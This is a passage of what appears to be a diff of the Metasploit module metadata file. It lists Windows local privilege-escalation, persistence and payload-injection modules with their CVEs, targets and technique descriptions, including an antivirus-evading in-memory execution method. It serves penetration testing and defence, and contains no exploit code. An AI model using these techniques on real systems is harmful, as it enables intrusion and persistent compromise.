"autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms16_075_reflection_juicy.rb", - "is_install_path": true, - "ref_name": "windows/local/ms16_075_reflection_juicy", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms18_8120_win32k_privesc": { - "name": "Windows SetImeInfoEx Win32k NULL Pointer Dereference", - "fullname": "exploit/windows/local/ms18_8120_win32k_privesc", - "aliases": [], - "rank": 400, - "disclosure_date": "2018-05-09", - "type": "exploit", - "author": [ - "unamer", - "bigric3", - "Anton Cherepanov", - "Dhiraj Mishra " - ], - "description": "This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2\n when the Win32k component fails to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run arbitrary code in kernel mode. An\n attacker could then install programs; view, change, or delete data; or create new\n accounts with full user rights.\n\n This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.", - "references": [ - "BID-104034", - "CVE-2018-8120", - "URL-https://github.com/unamer/CVE-2018-8120", - "URL-https://github.com/bigric3/cve-2018-8120", - "URL-http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 7 x64", - "Windows 7 x86" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/ms18_8120_win32k_privesc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/ms_ndproxy": { - "name": "MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation", - "fullname": "exploit/windows/local/ms_ndproxy", - "aliases": [], - "rank": 200, - "disclosure_date": "2013-11-27", - "type": "exploit", - "author": [ - "Unknown", - "ryujin", - "Shahin Ramezany", - "juan vazquez " - ], - "description": "This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003\n SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while\n processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used\n to access an array unsafely, and the value is used to perform a call, leading to a NULL\n pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This\n module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to\n work the service \"Routing and Remote Access\" must be running on the target system.", - "references": [ - "CVE-2013-5065", - "MSB-MS14-002", - "OSVDB-100368", - "BID-63971", - "EDB-30014", - "URL-http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/", - "URL-http://technet.microsoft.com/en-us/security/advisory/2914486", - "URL-http://www.secniu.com/blog/?p=53", - "URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html", - "URL-http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP3", - "Windows Server 2003 SP2" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms_ndproxy.rb", - "is_install_path": true, - "ref_name": "windows/local/ms_ndproxy", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/novell_client_nicm": { - "name": "Novell Client 2 SP3 nicm.sys Local Privilege Escalation", - "fullname": "exploit/windows/local/novell_client_nicm", - "aliases": [], - "rank": 200, - "disclosure_date": "2013-05-22", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a flaw in the nicm.sys driver to execute arbitrary code in\n kernel space. The vulnerability occurs while handling ioctl requests with code\n 0x143B6B, where a user provided pointer is used as function pointer. The module\n has been tested successfully on Windows 7 SP1 with Novell Client 2 SP3.", - "references": [ - "CVE-2013-3956", - "OSVDB-93718", - "URL-http://www.novell.com/support/kb/doc.php?id=7012497", - "URL-http://pastebin.com/GB4iiEwR" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 7 SP1" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/novell_client_nicm.rb", - "is_install_path": true, - "ref_name": "windows/local/novell_client_nicm", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/novell_client_nwfs": { - "name": "Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation", - "fullname": "exploit/windows/local/novell_client_nwfs", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-06-26", - "type": "exploit", - "author": [ - "Ruben Santamarta", - "juan vazquez " - ], - "description": "This module exploits a flaw in the nwfs.sys driver to overwrite data in kernel\n space. The corruption occurs while handling ioctl requests with code 0x1438BB,\n where a 0x00000009 dword is written to an arbitrary address. An entry within the\n HalDispatchTable is overwritten in order to execute arbitrary code when\n NtQueryIntervalProfile is called. The module has been tested successfully on\n Windows XP SP3 with Novell Client 4.91 SP4.", - "references": [ - "CVE-2008-3158", - "OSVDB-46578", - "BID-30001" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP3" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/novell_client_nwfs.rb", - "is_install_path": true, - "ref_name": "windows/local/novell_client_nwfs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/nscp_pe": { - "name": "NSClient++ 0.5.2.35 - Privilege escalation", - "fullname": "exploit/windows/local/nscp_pe", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-10-20", - "type": "exploit", - "author": [ - "kindredsec", - "BZYO", - "Yann Castel (yann.castel " - ], - "description": "This module allows an attacker with an unprivileged windows account to gain admin access on windows system and start a shell.\n For this module to work, both the NSClient++ web interface and `ExternalScripts` features must be enabled.\n You must also know where the NSClient config file is, as it is used to read the admin password which is stored in clear text.", - "references": [ - "EDB-48360", - "EDB-46802" - ], - "platform": "Windows", - "arch": "x64", - "rport": 8443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/local/nscp_pe.rb", - "is_install_path": true, - "ref_name": "windows/local/nscp_pe", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ntapphelpcachecontrol": { - "name": "MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check", - "fullname": "exploit/windows/local/ntapphelpcachecontrol", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-09-30", - "type": "exploit", - "author": [ - "James Forshaw", - "sinn3r " - ], - "description": "On Windows, the system call NtApphelpCacheControl (the code is actually in ahcache.sys)\n allows application compatibility data to be cached for quick reuse when new processes are\n created. A normal user can query the cache but cannot add new cached entries as the\n operation is restricted to administrators. This is checked in the function\n AhcVerifyAdminContext.\n\n This function has a vulnerability where it doesn't correctly check the impersonation token\n of the caller to determine if the user is an administrator. It reads the caller's\n impersonation token using PsReferenceImpersonationToken and then does a comparison between\n the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level\n of the token so it's possible to get an identify token on your thread from a local system\n process and bypass this check.\n\n This module currently only affects Windows 8 and Windows 8.1, and requires access to\n C:\\Windows\\System\\ComputerDefaults.exe (although this can be improved).", - "references": [ - "MSB-MS15-001", - "CVE-2015-0002", - "OSVDB-116497", - "EDB-35661", - "URL-https://code.google.com/p/google-security-research/issues/detail?id=118" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 8 / Windows 8.1 (x86 and x64)" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ntapphelpcachecontrol.rb", - "is_install_path": true, - "ref_name": "windows/local/ntapphelpcachecontrol", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ntusermndragover": { - "name": "Microsoft Windows NtUserMNDragOver Local Privilege Elevation", - "fullname": "exploit/windows/local/ntusermndragover", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-03-12", - "type": "exploit", - "author": [ - "Clément Lecigne", - "Grant Willcox", - "timwr" - ], - "description": "This module exploits a NULL pointer dereference vulnerability in\n MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.\n\n The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()\n function does not effectively check the validity of the tagPOPUPMENU\n objects it processes before passing them on to MNGetpItemFromIndex(),\n where the NULL pointer dereference will occur.\n\n This module has been tested against Windows 7 x86 SP0 and SP1. Offsets\n within the solution may need to be adjusted to work with other versions\n of Windows, such as Windows Server 2008.", - "references": [ - "CVE-2019-0808", - "URL-https://github.com/exodusintel/CVE-2019-0808", - "URL-https://github.com/ze0r/cve-2019-0808-poc", - "URL-http://blogs.360.cn/post/RootCause_CVE-2019-0808_EN.html", - "URL-https://blog.exodusintel.com/2019/05/17/windows-within-windows/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 x86" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ntusermndragover.rb", - "is_install_path": true, - "ref_name": "windows/local/ntusermndragover", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/nvidia_nvsvc": { - "name": "Nvidia (nvsvc) Display Driver Service Local Privilege Escalation", - "fullname": "exploit/windows/local/nvidia_nvsvc", - "aliases": [], - "rank": 200, - "disclosure_date": "2012-12-25", - "type": "exploit", - "author": [ - "Peter Wintersmith", - "Ben Campbell " - ], - "description": "The named pipe, \\pipe\\nsvr, has a NULL DACL allowing any authenticated user to\n interact with the service. It contains a stacked based buffer overflow as a result\n of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe',\n the service name is 'nvsvc', and the named pipe is 'nsvr'.\n\n This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.\n It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012.", - "references": [ - "CVE-2013-0109", - "OSVDB-88745", - "URL-http://nvidia.custhelp.com/app/answers/detail/a_id/3288" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/nvidia_nvsvc.rb", - "is_install_path": true, - "ref_name": "windows/local/nvidia_nvsvc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/panda_psevents": { - "name": "Panda Security PSEvents Privilege Escalation", - "fullname": "exploit/windows/local/panda_psevents", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-06-27", - "type": "exploit", - "author": [ - "h00die ", - "Security-Assessment.com" - ], - "description": "PSEvents.exe within several Panda Security products runs hourly with SYSTEM privileges.\n When run, it checks a user writable folder for certain DLL files, and if any are found\n they are automatically run.\n Vulnerable Products:\n Panda Global Protection 2016 (<=16.1.2)\n Panda Antivirus Pro 2016 (<=16.1.2)\n Panda Small Business Protection (<=16.1.2)\n Panda Internet Security 2016 (<=16.1.2)", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/panda_psevents.rb", - "is_install_path": true, - "ref_name": "windows/local/panda_psevents", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/payload_inject": { - "name": "Windows Manage Memory Payload Injection", - "fullname": "exploit/windows/local/payload_inject", - "aliases": [ - "post/windows/manage/payload_inject" - ], - "rank": 600, - "disclosure_date": "2011-10-12", - "type": "exploit", - "author": [ - "Carlos Perez ", - "sinn3r " - ], - "description": "This module will inject a payload into memory of a process. If a payload\n isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID\n datastore option isn't specified, then it'll inject into notepad.exe instead.", - "references": [], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/payload_inject.rb", - "is_install_path": true, - "ref_name": "windows/local/payload_inject", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/persistence": { - "name": "Windows Persistent Registry Startup Payload Installer", - "fullname": "exploit/windows/local/persistence", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-10-19", - "type": "exploit", - "author": [ - "Carlos Perez ", - "g0tmi1k" - ], - "description": "This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" (depending on privilege and selected method).", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/persistence.rb", - "is_install_path": true, - "ref_name": "windows/local/persistence", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/persistence_image_exec_options": { - "name": "Windows Silent Process Exit Persistence", - "fullname": "exploit/windows/local/persistence_image_exec_options", - "aliases": [], - "rank": 600, - "disclosure_date": "2008-06-28", - "type": "exploit", - "author": [ - "Mithun Shanbhag", - "bwatters-r7" - ], - "description": "Windows allows you to set up a debug process when a process exits.\n This module uploads a payload and declares that it is the debug\n process to launch when a specified process exits.", - "references": [ - "URL-https://attack.mitre.org/techniques/T1183/", - "URL-https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/persistence_image_exec_options.rb", - "is_install_path": true, - "ref_name": "windows/local/persistence_image_exec_options", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/persistence_service": { - "name": "Windows Persistent Service Installer", - "fullname": "exploit/windows/local/persistence_service", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-10-20", - "type": "exploit", - "author": [ - "Green-m " - ], - "description": "This Module will generate and upload an executable to a remote host, next will make it a persistent service.\n It will create a new service which will start the payload whenever the service is running. Admin or system\n privilege is required.", - "references": [ - "URL-https://github.com/rapid7/metasploit-framework/blob/master/external/source/metsvc/src/metsvc.cpp" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/persistence_service.rb", - "is_install_path": true, - "ref_name": "windows/local/persistence_service", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/plantronics_hub_spokesupdateservice_privesc": { - "name": "Plantronics Hub SpokesUpdateService Privilege Escalation", - "fullname": "exploit/windows/local/plantronics_hub_spokesupdateservice_privesc", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-08-30", - "type": "exploit", - "author": [ - "Markus Krell", - "bcoles " - ], - "description": "The Plantronics Hub client application for Windows makes use of an\n automatic update service `SpokesUpdateService.exe` which automatically\n executes a file specified in the `MajorUpgrade.config` configuration\n file as SYSTEM. The configuration file is writable by all users by default.\n\n This module has been tested successfully on Plantronics Hub version 3.13.2\n on Windows 7 SP1 (x64).", - "references": [ - "CVE-2019-15742", - "EDB-47845", - "URL-https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/plantronics_hub_spokesupdateservice_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/powershell_cmd_upgrade": { - "name": "Windows Command Shell Upgrade (Powershell)", - "fullname": "exploit/windows/local/powershell_cmd_upgrade", - "aliases": [], - "rank": 600, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "Ben Campbell " - ], - "description": "This module executes Powershell to upgrade a Windows Shell session\n to a full Meterpreter session.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/local/powershell_cmd_upgrade.rb", - "is_install_path": true, - "ref_name": "windows/local/powershell_cmd_upgrade", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/powershell_remoting": { - "name": "Powershell Remoting Remote Command Execution", - "fullname": "exploit/windows/local/powershell_remoting", - "aliases": [], - "rank": 600, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "Ben Campbell " - ], - "description": "This module uses Powershell Remoting (TCP 47001) to inject payloads on target machines.\n If RHOSTS are specified, it will try to resolve the IPs to hostnames, otherwise\n use a HOSTFILE to supply a list of known hostnames.", - "references": [ - "CVE-1999-0504", - "OSVDB-3106" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/exploits/windows/local/powershell_remoting.rb", - "is_install_path": true, - "ref_name": "windows/local/powershell_remoting", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ppr_flatten_rec": { - "name": "Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation", - "fullname": "exploit/windows/local/ppr_flatten_rec", - "aliases": [], - "rank": 200, - "disclosure_date": "2013-05-15", - "type": "exploit", - "author": [ - "Tavis Ormandy ", - "progmboy ", - "Keebie4e", - "egypt ", - "sinn3r ", - "Ben Campbell ", - "juan vazquez ", - "OJ Reeves" - ], - "description": "This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage\n of uninitialized data which allows to corrupt memory. At the moment, the module has\n been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.", - "references": [ - "CVE-2013-3660", - "EDB-25912", - "OSVDB-93539", - "MSB-MS13-053", - "URL-https://seclists.org/fulldisclosure/2013/May/91" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ppr_flatten_rec.rb", - "is_install_path": true, - "ref_name": "windows/local/ppr_flatten_rec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ps_persist": { - "name": "Powershell Payload Execution", - "fullname": "exploit/windows/local/ps_persist", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-08-14", - "type": "exploit", - "author": [ - "RageLtMan ", - "Matt \"hostess\" Andreko" - ], - "description": "This module generates a dynamic executable on the session host using .NET templates.\n Code is pulled from C# templates and impregnated with a payload before being\n sent to a modified PowerShell session with .NET 4 loaded. The compiler builds\n the executable (standard or Windows service) in memory and produces a binary\n which can be started/installed and downloaded for later use. After compilation the\n PoweShell session can also sign the executable if provided a path the a .pfx formatted\n certificate.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ps_persist.rb", - "is_install_path": true, - "ref_name": "windows/local/ps_persist", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ps_wmi_exec": { - "name": "Authenticated WMI Exec via Powershell", - "fullname": "exploit/windows/local/ps_wmi_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-08-19", - "type": "exploit", - "author": [ - "RageLtMan " - ], - "description": "This module uses WMI execution to launch a payload instance on a remote machine.\n In order to avoid AV detection, all execution is performed in memory via psh-net\n encoded payload. Persistence option can be set to keep the payload looping while\n a handler is present to receive it. By default the module runs as the current\n process owner. The module can be configured with credentials for the remote host\n with which to launch the process.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/local/ps_wmi_exec.rb", - "is_install_path": true, - "ref_name": "windows/local/ps_wmi_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/pxeexploit": { - "name": "PXE Exploit Server", - "fullname": "exploit/windows/local/pxeexploit", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-08-05", - "type": "exploit", - "author": [ - "scriptjunkie" - ], - "description": "This module provides a PXE server, running a DHCP and TFTP server.\n The default configuration loads a linux kernel and initrd into memory that\n reads the hard drive; placing the payload on the hard drive of any Windows\n partition seen.\n\n Note: the displayed IP address of a target is the address this DHCP server\n handed out, not the \"normal\" IP address the host uses.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2022-03-10 18:03:35 +0000", - "path": "/modules/exploits/windows/local/pxeexploit.rb", - "is_install_path": true, - "ref_name": "windows/local/pxeexploit", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/local/razer_zwopenprocess": { - "name": "Razer Synapse rzpnk.sys ZwOpenProcess", - "fullname": "exploit/windows/local/razer_zwopenprocess", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-03-22", - "type": "exploit", - "author": [ - "Spencer McIntyre" - ], - "description": "A vulnerability exists in the latest version of Razer Synapse\n (v2.20.15.1104 as of the day of disclosure) which can be leveraged\n locally by a malicious application to elevate its privileges to those of\n NT_AUTHORITY\\SYSTEM. The vulnerability lies in a specific IOCTL handler\n in the rzpnk.sys driver that passes a PID specified by the user to\n ZwOpenProcess. This can be issued by an application to open a handle to\n an arbitrary process with the necessary privileges to allocate, read and\n write memory in the specified process.\n\n This exploit leverages this vulnerability to open a handle to the\n winlogon process (which runs as NT_AUTHORITY\\SYSTEM) and infect it by\n installing a hook to execute attacker controlled shellcode. This hook is\n then triggered on demand by calling user32!LockWorkStation(), resulting\n in the attacker's payload being executed with the privileges of the\n infected winlogon process. In order for the issued IOCTL to work, the\n RazerIngameEngine.exe process must not be running. This exploit will\n check if it is, and attempt to kill it as necessary.\n\n The vulnerable software can be found here:\n https://www.razerzone.com/synapse/. No Razer hardware needs to be\n connected in order to leverage this vulnerability.\n\n This exploit is not opsec-safe due to the user being logged out as part\n of the exploitation process.", - "references": [ - "CVE-2017-9769", - "URL-https://warroom.securestate.com/cve-2017-9769/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/razer_zwopenprocess.rb", - "is_install_path": true, - "ref_name": "windows/local/razer_zwopenprocess", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-restarts" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/registry_persistence": { - "name": "Windows Registry Only Persistence", - "fullname": "exploit/windows/local/registry_persistence", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-07-01", - "type": "exploit", - "author": [ - "Donny Maasland " - ], - "description": "This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" (depending on privilege and selected method).\n The payload will be installed completely in registry.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/local/registry_persistence.rb", - "is_install_path": true, - "ref_name": "windows/local/registry_persistence", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ricoh_driver_privesc": { - "name": "Ricoh Driver Privilege Escalation", - "fullname": "exploit/windows/local/ricoh_driver_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-01-22", - "type": "exploit", - "author": [ - "Alexander Pudwill", - "Pentagrid AG", - "Shelby Pace" - ], - "description": "Various Ricoh printer drivers allow escalation of\n privileges on Windows systems.\n\n For vulnerable drivers, a low-privileged user can\n read/write files within the `RICOH_DRV` directory\n and its subdirectories.\n\n `PrintIsolationHost.exe`, a Windows process running\n as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs\n during the installation of a printer. A user can\n elevate to SYSTEM by writing a malicious DLL to\n the vulnerable driver directory and adding a new\n printer with a vulnerable driver.\n\n This module leverages the `prnmngr.vbs` script\n to add and delete printers. Multiple runs of this\n module may be required given successful exploitation\n is time-sensitive.", - "references": [ - "CVE-2019-19363", - "URL-https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ricoh_driver_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/ricoh_driver_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "unreliable-session" - ], - "Stability": [ - "service-resource-loss" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/run_as": { - "name": "Windows Run Command As User", - "fullname": "exploit/windows/local/run_as", - "aliases": [], - "rank": 600, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "Kx499", - "Ben Campbell " - ], - "description": "This module will login with the specified username/password and execute the\n supplied command as a hidden process. Output is not returned by default.\n Unless targeting a local user either set the DOMAIN, or specify a UPN user\n format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function.\n\n A custom command line can be sent instead of uploading an executable.\n APPLICAITON_NAME and COMMAND_LINE are passed to lpApplicationName and lpCommandLine\n respectively. See the MSDN documentation for how these two values interact.", - "references": [ - "URL-https://msdn.microsoft.com/en-us/library/windows/desktop/ms682431" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2022-06-29 19:18:47 +0000", - "path": 